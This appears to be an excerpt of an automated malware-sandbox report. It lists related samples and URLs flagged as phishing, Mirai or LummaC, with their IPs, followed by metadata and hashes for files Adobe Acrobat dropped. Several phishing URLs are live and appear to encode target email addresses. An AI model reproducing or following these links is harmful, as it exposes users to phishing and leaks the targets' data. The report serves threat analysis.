                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=temadewelgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%6D%6F%74%6C%65%79%2D%61%6D%65%6E%61%62%6C%65%2D%73%74%69%6E%67%2E%67%6C%69%74%63%68%2E%6D%65#Y2hhbmd5ZW9sLmNob2lAaHl1bmRhaWVsZXZhdG9yLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                    • 104.23.168.53
                                                                                    loader.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.151.119
                                                                                    support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 104.21.64.1
                                                                                    https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpub-c51a5b71098c4a50b29ad0816d037292.r2.dev%2525252Findex.html%25252F1FPh%25252FkO25AQ%25252FAQ%25252F3e065842-509e-4fd5-abbb-5283a8ac4086%25252F1%25252FRkloQ4shWG%252F1FPh%252Fk_25AQ%252FAQ%252Fdde43c95-583c-418a-adc0-08f493a126f6%252F1%252FJb7OErMoyM%2F1FPh%2Fk_25AQ%2FAQ%2Fb4b83026-0c0f-44d4-9e59-6245afb2c831%2F1%2F0MDiG0XvGK/1FPh/le25AQ/AQ/97716a3f-8a20-4219-bc1f-a50876348ddc/1/HkaU6VJ0d2#Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.57.143
                                                                                    ALABANZA-BALTUSsh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 65.109.195.251
                                                                                    https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 65.109.232.106
                                                                                    sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 65.109.37.232
                                                                                    Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 65.109.232.106
                                                                                    https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==Get hashmaliciousUnknownBrowse
                                                                                    • 65.109.23.99
                                                                                    Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 65.109.232.106
                                                                                    arm.elfGet hashmaliciousMiraiBrowse
                                                                                    • 65.108.192.85
                                                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 65.109.107.240
                                                                                    powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 208.56.163.168
                                                                                    pbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                                                                                    • 208.56.82.129
                                                                                    CLOUDFLARENETUShades.exeGet hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                    • 104.21.23.76
                                                                                    https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                                                                                    • 104.16.123.96
                                                                                    https://technicalwriterhq.com/Get hashmaliciousUnknownBrowse
                                                                                    • 1.1.1.1
                                                                                    https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=temadewelgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%6D%6F%74%6C%65%79%2D%61%6D%65%6E%61%62%6C%65%2D%73%74%69%6E%67%2E%67%6C%69%74%63%68%2E%6D%65#Y2hhbmd5ZW9sLmNob2lAaHl1bmRhaWVsZXZhdG9yLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                    • 104.17.25.14
                                                                                    jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                    • 104.23.168.53
                                                                                    loader.exeGet hashmaliciousLummaCBrowse
                                                                                    • 172.67.151.119
                                                                                    support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                    • 104.21.64.1
                                                                                    https://click.pstmrk.it/3s/click.pstmrk.it%2F3s%2Fclick.pstmrk.it%252F3s%252Fclick.pstmrk.it%25252F3s%25252Fpub-c51a5b71098c4a50b29ad0816d037292.r2.dev%2525252Findex.html%25252F1FPh%25252FkO25AQ%25252FAQ%25252F3e065842-509e-4fd5-abbb-5283a8ac4086%25252F1%25252FRkloQ4shWG%252F1FPh%252Fk_25AQ%252FAQ%252Fdde43c95-583c-418a-adc0-08f493a126f6%252F1%252FJb7OErMoyM%2F1FPh%2Fk_25AQ%2FAQ%2Fb4b83026-0c0f-44d4-9e59-6245afb2c831%2F1%2F0MDiG0XvGK/1FPh/le25AQ/AQ/97716a3f-8a20-4219-bc1f-a50876348ddc/1/HkaU6VJ0d2#Get hashmaliciousUnknownBrowse
                                                                                    • 104.21.57.143
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):292
                                                                                    Entropy (8bit):5.214695971076517
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:7Q3+cN+q2Pwkn2nKuAl9OmbnIFUt8OQ3+JwZZmw+OQ3+JwNVkwOwkn2nKuAl9Omt:7Q3vN+vYfHAahFUt8OQ3kwZ/+OQ3kwNU
                                                                                    MD5:167E75F954424E39A77011844DE92B06
                                                                                    SHA1:7CAF301DE3B5D1EC6C5B1B6CD1825397D12D1449
                                                                                    SHA-256:0654D1B117602C42F9E2D03AC0AB062B0F2E2C4AF5A244ED610B41FE43EC1220
                                                                                    SHA-512:75B26DDC13E9F3BF13DC56675FB8AAB251039290C681B0212E660311B036814E5BE6BEB11086CD2A19F73C800711EB0AAA90D8903ACE3AD7198B2009E93F62D0
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:2024/12/17-18:28:30.335 1ddc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-18:28:30.337 1ddc Recovering log #3.2024/12/17-18:28:30.337 1ddc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):292
                                                                                    Entropy (8bit):5.214695971076517
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:7Q3+cN+q2Pwkn2nKuAl9OmbnIFUt8OQ3+JwZZmw+OQ3+JwNVkwOwkn2nKuAl9Omt:7Q3vN+vYfHAahFUt8OQ3kwZ/+OQ3kwNU
                                                                                    MD5:167E75F954424E39A77011844DE92B06
                                                                                    SHA1:7CAF301DE3B5D1EC6C5B1B6CD1825397D12D1449
                                                                                    SHA-256:0654D1B117602C42F9E2D03AC0AB062B0F2E2C4AF5A244ED610B41FE43EC1220
                                                                                    SHA-512:75B26DDC13E9F3BF13DC56675FB8AAB251039290C681B0212E660311B036814E5BE6BEB11086CD2A19F73C800711EB0AAA90D8903ACE3AD7198B2009E93F62D0
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:2024/12/17-18:28:30.335 1ddc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/17-18:28:30.337 1ddc Recovering log #3.2024/12/17-18:28:30.337 1ddc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):336
                                                                                    Entropy (8bit):5.171853398481108
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:7Q3+H7uQqM+q2Pwkn2nKuAl9Ombzo2jMGIFUt8OQ3+HkvZmw+OQ3+H5aMVkwOwkV:7Q3gu8+vYfHAa8uFUt8OQ3t/+OQ3IV56
                                                                                    MD5:96D7B06CBC809DD0961256D05EC2813D
                                                                                    SHA1:2EC85822A1E250D995DC4C169C519E80FB80D88C
                                                                                    SHA-256:A2ECB12E9C4FC0A3A7F0F3A48684C399B05A6FA7AD1646704CE984A04568EB6D
                                                                                    SHA-512:31AD4C8D584B4C3F6E2FD551D5368B99450FF185E56F7C20C3550520D100614B655D7CC58B30E534B7E2EA2B36E5CF2CC703561F6ACD53E0DCACA05A09F40117
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:2024/12/17-18:28:30.404 1eac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-18:28:30.405 1eac Recovering log #3.2024/12/17-18:28:30.406 1eac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):336
                                                                                    Entropy (8bit):5.171853398481108
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:7Q3+H7uQqM+q2Pwkn2nKuAl9Ombzo2jMGIFUt8OQ3+HkvZmw+OQ3+H5aMVkwOwkV:7Q3gu8+vYfHAa8uFUt8OQ3t/+OQ3IV56
                                                                                    MD5:96D7B06CBC809DD0961256D05EC2813D
                                                                                    SHA1:2EC85822A1E250D995DC4C169C519E80FB80D88C
                                                                                    SHA-256:A2ECB12E9C4FC0A3A7F0F3A48684C399B05A6FA7AD1646704CE984A04568EB6D
                                                                                    SHA-512:31AD4C8D584B4C3F6E2FD551D5368B99450FF185E56F7C20C3550520D100614B655D7CC58B30E534B7E2EA2B36E5CF2CC703561F6ACD53E0DCACA05A09F40117
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:2024/12/17-18:28:30.404 1eac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/17-18:28:30.405 1eac Recovering log #3.2024/12/17-18:28:30.406 1eac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:JSON data
                                                                                    Category:modified
                                                                                    Size (bytes):475
                                                                                    Entropy (8bit):4.969516568575897
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YH/um3RA8sq7oXhsBdOg2Hycaq3QYiubInP7E4TX:Y2sRdstidMHd3QYhbG7n7
                                                                                    MD5:B703F574A9CE92D8A7A6D9B596079A31
                                                                                    SHA1:0D76A090B18DF616F30AB4FF096AF8F2DEE33991
                                                                                    SHA-256:7E4614E448EB1A51A5DC93FE8317DD0F572D7E2F7FCC7E847DCABFB4BF3C9BD4
                                                                                    SHA-512:069860F70083361C5FCDAF4152B9E204EF7F319E51E6AE6A1025D0F628D9540DEED708120C5E226585940A3263900456A4C52CCC02F68DD94E4120F34E72680A
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379038119190164","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":629588},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):475
                                                                                    Entropy (8bit):4.967403857886107
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                                    MD5:B7761633048D74E3C02F61AD04E00147
                                                                                    SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                                    SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                                    SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                                    Malicious:false
                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):475
                                                                                    Entropy (8bit):4.967403857886107
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                                    MD5:B7761633048D74E3C02F61AD04E00147
                                                                                    SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                                    SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                                    SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                                    Malicious:false
                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):475
                                                                                    Entropy (8bit):4.967403857886107
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                                                    MD5:B7761633048D74E3C02F61AD04E00147
                                                                                    SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                                                    SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                                                    SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                                                    Malicious:false
                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):4730
                                                                                    Entropy (8bit):5.255261363644731
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7Xnei69ne46Z:etJCV4FiN/jTN/2r8Mta02fEhgO73go5
                                                                                    MD5:762EF59D55FBA78C27BFEDD9362FDBAE
                                                                                    SHA1:C4422D40E364C32F119ECA998FBBD90E3E62F4DE
                                                                                    SHA-256:75D86195E95F922C5F21B734BB5A9A83AD41A85E1FEFFF8C20B69BC54247A84B
                                                                                    SHA-512:C3C8DC2D9C1203FBA407836BFBEA33028581F8A93281ED30C1D673ACBC9B271D833431A7CC4DE2B99569B0B46FA80030415760BD3DD6F0957D89778A5D1AD4C0
                                                                                    Malicious:false
                                                                                    Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):324
                                                                                    Entropy (8bit):5.18206488341129
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:7Q3+9AvqM+q2Pwkn2nKuAl9OmbzNMxIFUt8OQ3+ZZmw+OQ3+DMVkwOwkn2nKuAlG:7Q3eQ3+vYfHAa8jFUt8OQ3M/+OQ3hV51
                                                                                    MD5:E0AA8CD6557D42CED0BEF00CBFB8E20A
                                                                                    SHA1:FD7B48C19D6E5D9A86867D4A7C7CF1260CC1C06F
                                                                                    SHA-256:F7FFFB0D35BE3A4042B20AE5912052A17D994BFCDA9F1F67565F25F99054A642
                                                                                    SHA-512:DE29B8C38A065B2F72613CCE2C332FD92744228186E6F40086E0055CF260EBC8CACBE8318FDDD7CB0CBACEE79CEE198B30E2A13FD6E68BCF1B594BF2D6BD62AB
                                                                                    Malicious:false
                                                                                    Preview:2024/12/17-18:28:30.582 1eac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-18:28:30.583 1eac Recovering log #3.2024/12/17-18:28:30.584 1eac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):324
                                                                                    Entropy (8bit):5.18206488341129
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:7Q3+9AvqM+q2Pwkn2nKuAl9OmbzNMxIFUt8OQ3+ZZmw+OQ3+DMVkwOwkn2nKuAlG:7Q3eQ3+vYfHAa8jFUt8OQ3M/+OQ3hV51
                                                                                    MD5:E0AA8CD6557D42CED0BEF00CBFB8E20A
                                                                                    SHA1:FD7B48C19D6E5D9A86867D4A7C7CF1260CC1C06F
                                                                                    SHA-256:F7FFFB0D35BE3A4042B20AE5912052A17D994BFCDA9F1F67565F25F99054A642
                                                                                    SHA-512:DE29B8C38A065B2F72613CCE2C332FD92744228186E6F40086E0055CF260EBC8CACBE8318FDDD7CB0CBACEE79CEE198B30E2A13FD6E68BCF1B594BF2D6BD62AB
                                                                                    Malicious:false
                                                                                    Preview:2024/12/17-18:28:30.582 1eac Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/17-18:28:30.583 1eac Recovering log #3.2024/12/17-18:28:30.584 1eac Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                    Category:dropped
                                                                                    Size (bytes):65110
                                                                                    Entropy (8bit):3.0329031484492486
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:QFhhotHBq6n59Djunm/FVtqX4vhEn34vff5s5O0q+qCHtI:QFgthHP2nYzt5EMhsk60
                                                                                    MD5:2FC46957465BC6FE134F35A9F33BB1F2
                                                                                    SHA1:705C4BF8FDE06DD0FF7525895FF3C451C5672824
                                                                                    SHA-256:0C3181C5B53E5D8B157E1B08F67576E97A98AE7A2DC3BE236967A320EA235B28
                                                                                    SHA-512:EBC6BB4364446C68B41DB884A49E240DE8C83C9FFFB912EBFCA9B46E1C78A2C172E0886EDAC2BD9F591BDE5F0D50750335AD2002EF7EC3330FCA28DF0093990C
                                                                                    Malicious:false
                                                                                    Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                    Category:dropped
                                                                                    Size (bytes):86016
                                                                                    Entropy (8bit):4.445268906092557
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:yezci5tuiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rBs3OazzU89UTTgUL
                                                                                    MD5:9F130CC96D4816C9AD04CDE58DC01133
                                                                                    SHA1:B6BA6A5C55B7418136E8D7E6228F3F1B1B8E5444
                                                                                    SHA-256:807B17E117AE32F52180EBD7A51DFE572383D0D879BF1A34AE65855B51AD4FB0
                                                                                    SHA-512:2FAF0AF0D1E9FFD5802863429B436A91D44FB0E1403235B78AA317132DC51654821BB9945FD4021F6D2DDD2C98A45EEA318B73650FA6A71411D18531C6349746
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                    File Type:SQLite Rollback Journal
                                                                                    Category:dropped
                                                                                    Size (bytes):8720
                                                                                    Entropy (8bit):3.7769783225628415
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:7MZp/E2ioyVbioy9oWoy1Cwoy1bKOioy1noy1AYoy1Wioy1hioybioyXoy1noy1G:72pjubFiXKQKRb9IVXEBodRBkk
                                                                                    MD5:D3311A1F5AC8351D6919A488B0965034
                                                                                    SHA1:A44A21036BC4B5501305A4C3C3B1BF5AD1A9BA7D
                                                                                    SHA-256:B6F08308EE4D1E3008E03924A6C5B4C2DDD50430FB9EC0730C3F4088B5BE650F
                                                                                    SHA-512:5C56FB88332C672B1D78B4686F4E8F3F8E45200EDDD0FDEB31BCFAD38308C5BFF84A7A082188E10F85758754030110327B42FE2BDC4572BAC93E21A564AE0276
                                                                                    Malicious:false
                                                                                    Preview:.... .c.....{.F...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:Certificate, Version=3
                                                                                    Category:dropped
                                                                                    Size (bytes):1391
                                                                                    Entropy (8bit):7.705940075877404
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                    MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                    SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                    SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                    SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                    Malicious:false
                                                                                    Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                    Category:dropped
                                                                                    Size (bytes):71954
                                                                                    Entropy (8bit):7.996617769952133
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                    Malicious:false
                                                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
